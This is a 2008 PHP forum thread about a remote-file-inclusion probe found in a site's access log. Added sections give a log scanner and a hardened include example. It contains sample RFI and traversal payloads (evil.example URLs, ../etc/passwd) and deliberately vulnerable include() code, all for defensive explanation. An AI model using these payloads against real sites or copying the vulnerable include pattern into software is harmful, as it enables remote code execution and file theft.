Possible Hijacking Problem

I was checking my log file and noticed something unusual:

[code]78.76.64.123 - - [04/Apr/2008:19:19:35 -0500] "GET /view.php?file=http://myweddingphotos.by.ru/images? HTTP/1.1" 200 17116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"[/code]

I have this on a Web page that displays a list of article titles. When you click on a title the view.php opens with that article:

[code=php]<a href='view.php?file=$id'>$title</a>[/code]

But as you can see above it appears that someone has replaced the file number of the article with another website.

Can anyone tell me what is happening and how I can stop it?

Thanks.
Alan
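The log line in the question is the classic shape of a remote-file-inclusion (RFI) probe: a URL stuffed into a parameter that the attacker hopes is passed to include(), with a trailing "?" so that anything the script appends (such as ".php") becomes part of the remote URL's query string instead of the path. As an added example that is not part of the original post, the script below scans access-log lines in Apache combined format (assumed; the sample lines are constructed, the first one mirroring the entry quoted above) and flags requests whose query parameters carry a URL or a "../" traversal sequence.

```php
<?php
// Added example, not from the original post: flag access-log requests whose
// query-string parameters carry a URL (RFI probe) or a traversal sequence (LFI probe).
// Sample lines are constructed; the first mirrors the entry quoted in the question.

$sampleLog = <<<'LOG'
78.76.64.123 - - [04/Apr/2008:19:19:35 -0500] "GET /view.php?file=http://myweddingphotos.by.ru/images? HTTP/1.1" 200 17116 "-" "Mozilla/4.0"
10.0.0.5 - - [04/Apr/2008:19:20:01 -0500] "GET /view.php?file=42 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
10.0.0.6 - - [04/Apr/2008:19:21:17 -0500] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 200 9120 "-" "curl/7.19"
10.0.0.7 - - [04/Apr/2008:19:22:40 -0500] "GET /index.php?page=ftp%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.1" 404 512 "-" "Mozilla/5.0"
LOG;

// Apache combined format (assumed): client identd user [time] "request" status bytes "referer" "agent".
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';

/**
 * Scan $log and return one entry per suspicious parameter:
 * ['ip', 'time', 'path', 'param', 'value', 'status', 'reason'].
 */
function findInclusionProbes(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match(LOG_RE, $line, $m)) {
            continue;                      // not a combined-format line; skip it
        }
        [, $ip, $time, $method, $target, $status] = $m;
        $query = parse_url($target, PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;                      // no query string, nothing to inspect
        }
        parse_str($query, $params);        // also decodes %xx sequences for us
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;                  // array-style params (a[]=...) are out of scope here
            }
            $reason = null;
            if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
                $reason = 'remote URL in parameter (RFI probe)';
            } elseif (strpos($value, '../') !== false || strpos($value, '..\\') !== false) {
                $reason = 'path traversal in parameter (LFI probe)';
            }
            if ($reason !== null) {
                $hits[] = [
                    'ip'     => $ip,
                    'time'   => $time,
                    'path'   => parse_url($target, PHP_URL_PATH),
                    'param'  => $name,
                    'value'  => $value,
                    'status' => (int) $status,
                    'reason' => $reason,
                ];
            }
        }
    }
    return $hits;
}

// Three of the four constructed lines are flagged; the plain "file=42" request is not.
foreach (findInclusionProbes($sampleLog) as $hit) {
    printf("%s %s %s?%s=%s -> %d  [%s]\n",
        $hit['time'], $hit['ip'], $hit['path'], $hit['param'], $hit['value'], $hit['status'], $hit['reason']);
}
```

The status code matters when reading the output: a 200 on a probe means the script accepted the parameter and returned something, which is worth checking by hand, whereas a 404 or 500 usually means the probe hit nothing. Run it with php-cli against a real log by replacing $sampleLog with file_get_contents() of the log file.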

PHP

9 Comment(s)

@LiLcRaZyFuZzY Apr 06.2008 — Odd, I'd also be interested what they gain by doing this.

anyone?
@chazzy Apr 06.2008 — It looks like someone found a possible vulnerability in your script, and was trying to inject something into your site. Do you have any known security holes?
@chazzy Apr 06.2008 — And by looking at the output of the target URL, it looks like someone is trying to hack your site.
@Alan_P author Apr 07.2008 — [QUOTE]do you have any known security holes?[/QUOTE]
None that I know of, but then I really haven't gone looking for any because I probably would know one if I saw it.

Is there any specific thing I should be looking for?

I haven't found anything wrong with my site; when I click on a title I get what I clicked on. So I don't know if this is a failed attempt or if they have found some secretive way to use my site to propagate their filth.
@bokeh Apr 07.2008 — Some people write terrible code like:
[code=php]include($_POST['file']);[/code]
If you try enough sites eventually you will find one that is vulnerable and the remote code will be executed.
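The pattern bokeh describes is not specific to $_POST: anything that flows from the request into include() or require() ($_GET, $_REQUEST, cookies) has the same problem, and the logged probe arrived as a GET parameter, which is exactly what the view.php link passes. Below, as an added example (not the poster's code, and not a claim about how their view.php is written), is the vulnerable shape next to a hardened one. It assumes PHP 7 or later and an articles/<id>.php layout under the script directory; both are assumptions chosen for illustration.

```php
<?php
// Added example, not the poster's code. Assumes PHP 7+ and a layout of
// articles/<id>.php next to this script; adjust ARTICLE_DIR for a real site.

// --- Vulnerable: the request parameter becomes the include path verbatim. ---
// With allow_url_include=On (before PHP 5.2, allow_url_fopen=On was enough),
// file=http://attacker.example/x?  fetches and executes remote PHP. Even with
// URL includes disabled, file=../../etc/passwd still reads local files (LFI).
function viewArticleVulnerable(): void
{
    // The trailing "?" in the logged probe turns the appended ".php" into a
    // query string of the remote URL, so the attacker controls the whole path.
    include $_GET['file'] . '.php';
}

// --- Hardened: user input selects a record, it never forms a path. ---
const ARTICLE_DIR = __DIR__ . '/articles';          // assumed layout

function resolveArticlePath(string $rawId): ?string
{
    // 1. Validate the shape. The link is built from a numeric $id, so accept
    //    only a plain positive integer; everything else is rejected outright.
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $rawId)) {
        return null;
    }
    // 2. Build the path ourselves from the validated key.
    $candidate = ARTICLE_DIR . '/' . $rawId . '.php';
    // 3. Defence in depth: confirm the resolved file really sits under ARTICLE_DIR
    //    (guards against symlinks or a future change that loosens step 1).
    $base = realpath(ARTICLE_DIR);
    $real = realpath($candidate);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function viewArticleHardened(): void
{
    $path = resolveArticlePath($_GET['file'] ?? '');
    if ($path === null) {
        if (PHP_SAPI !== 'cli') {
            http_response_code(404);
        }
        echo "No such article\n";
        return;
    }
    include $path;
}

// CLI demo:  php view.php 'http://evil.example/x?'   -> No such article
//            php view.php '../../etc/passwd'          -> No such article
//            php view.php 42                          -> includes articles/42.php if it exists
if (PHP_SAPI === 'cli') {
    $_GET['file'] = $argv[1] ?? '';
    viewArticleHardened();
}
```

If the articles live in the database rather than in files, the same rule applies with less machinery: cast the id to an integer and query by it, and never hand the raw parameter to include(), fopen(), file_get_contents() or a shell. Disabling allow_url_include (and allow_url_fopen where nothing needs it) in php.ini is a worthwhile second layer, but it does not fix the local-file case, so the validation in the script is the real fix.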
@Alan_P author Apr 07.2008 — What specifically are they trying to do; have one of their porn pictures open on my site?

I don't use an include in conjunction with a _POST, so I guess I'm good there.
@LiLcRaZyFuZzY Apr 07.2008 — I guess as long as you don't include anything or write to the DB directly without proper checking you should be alright.
@Alan_P author Apr 08.2008 — All my database entry forms are located in an admin area, which is password protected by an htaccess file on the server.

I also use this on my post variables:
[code=php]$article = mysql_real_escape_string($_POST['article']);[/code]
@bokeh Apr 08.2008 — [QUOTE]What specifically are they trying to do[...]?[/QUOTE]
Who cares what they are trying to do? Just make your site as secure as possible (test all inputs, etc.) and then quit worrying about what makes these strangers want to vandalize or steal from your website.